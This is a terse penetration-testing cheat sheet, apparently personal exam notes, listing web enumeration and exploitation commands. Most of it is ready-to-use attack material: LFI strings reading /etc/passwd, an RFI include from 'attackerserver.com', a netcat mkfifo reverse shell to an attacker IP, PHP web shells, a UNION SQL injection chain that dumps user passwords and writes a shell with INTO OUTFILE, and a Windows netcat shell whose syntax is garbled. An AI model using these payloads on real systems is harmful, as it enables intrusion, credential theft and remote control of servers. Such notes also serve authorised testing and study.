Enumeration and Exploitation
HTTP Enumeration
----------------------------------------------
# Gobuster
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
----------------------------------------------
# nikto
nikto -h <targetip>
----------------------------------------------
# curl
curl -v -X OPTIONS http://<targetip>/test/
curl --upload-file <file name> -v --url <url> -0 --http1.0
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
----------------------------------------------
# RFI
?page=http://attackerserver.com/evil.txt
----------------------------------------------
# Command Execution
<?php system('ls -la');?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
---------------------------------------------
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'
# find the number of columns
photoalbum.php?id=1 order by 8
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name='users'
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name='users'
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
# view files
' union select 1,2,3, load_file('/etc/passwd') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/login.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/includes/config.inc.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/mysqli_connect.php') ,5,6,7,8 -- -
# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
----------------------------------------------
# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
----------------------------------------------
# Windows Command Execution (RFI exploit)
# Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv ip 4444